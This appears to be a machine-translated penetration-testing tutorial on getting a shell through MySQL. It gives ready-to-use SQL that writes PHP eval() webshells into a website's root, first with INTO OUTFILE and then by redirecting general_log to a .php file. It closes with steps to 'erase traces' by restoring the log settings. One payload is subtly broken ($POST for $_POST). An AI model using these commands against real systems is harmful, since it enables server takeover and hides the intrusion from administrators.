[Getshell] MySQL upload webshell

---

One, select into outfile write directly

1. Conditions of use

• You need to have write permission for the web directory to be able to use single quotes (root)
• Know the absolute path of the website (phpinfo/php probe/by reporting errors, etc.)
• secure_file_priv has no specific value

2. View the secure_file_priv value

show global variables like '%secure%';

About secure_file_priv configuration introduction:

secure_file_priv is used to restrict the directory under which the load dumpfile, into outfile, and load_file() functions have the permission to upload or read files

当 secure_file_priv 的值为 NULL ，表示限制 mysqld 不允许导入|导出，此时无法提权
当 secure_file_priv 的值为 /tmp/ ，表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下，此时也无法提权
当 secure_file_priv 的值没有具体值时，表示不对 mysqld 的导入|导出做限制，此时可提权

The value of secure_file_priv is a read-only variable and can only be modified through the configuration file. If the administrator does not configure, then we cannot write to the shell, because we are testing by ourselves, so we can directly configure it.

It is configured in the MySQL configuration file my.ini:

3. Write a sentence

select '<?php @eval($POST[1]); ?>' INTO OUTFILE 'D:\\phpStudy\\PHPTutorial\\WWW\\a.php'

这里注意路径分隔符要用"\\"

Check whether a.php is generated in the root directory of the website, and whether the content is a sentence:

Two, use the global log to write to the shell

1. View the configuration

Check the log status of mysql. It is disabled by default, because the amount of this log is very large, which is a relatively large overhead for resources, so do not enable this function in a production environment!

show variables like '%general%';

2. Turn on general_log mode

The function of turning on general_log: Turn it on to record every command entered by the user, and save it in D:\phpStudy\PHPTutorial\MySQL\data\WIN-83V1721VG9V.loga file, which is actually what we often say about the
use of log files : After turning on general_log, change the value of general_log_file to the default path of the website In a certain custom php file, and then write a word Trojan through the log log, and then use it further.

Note here: Before modifying the log path, the source path must be recorded in advance, and we must restore the original path after obtaining the shell.

set global general_log = on;

3. Modify the log directory to the shell address

set global general_log_file='D:\\phpStudy\\PHPTutorial\\WWW\\hp.php';

4. Write to the shell

Because the logging function is turned on, the executed SQL statements will be recorded in the log

select '<?php eval($_POST[cmd]);?>'

5. Erase traces

set global general_log_file='D:\phpStudy\PHPTutorial\MySQL\data\WIN-83V1721VG9V.log';               // 恢复原log文件路径

set global general_log = off;   // 关闭全局日志